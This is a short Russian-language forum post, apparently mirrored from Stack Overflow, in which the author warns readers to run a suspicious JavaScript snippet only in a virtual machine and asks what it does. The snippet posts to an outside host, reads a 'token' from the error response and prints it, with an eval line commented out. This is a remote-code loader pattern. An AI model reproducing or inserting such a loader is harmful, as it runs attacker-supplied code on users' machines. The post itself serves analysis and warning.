ps. Не запускайте этот код в локальной машине, пока не понимаю его. (Используйте виртуальную машину!).
Если есть какие -либо другие форумы в комментариях.
Код: Выделить всё
axios
.post('http://fashdefi.store:6168/defy/v6')
.then((res) => {})
.catch((err) => {
const {
response: {
data: { token },
},
} = err;
console.log("===========================")
console.log(token);
console.log("=============================")
// eval(token);
});
https://codefile.io/f/vquzmauq0v
Подробнее здесь: https://stackoverflow.com/questions/795 ... r-the-file
Мобильная версия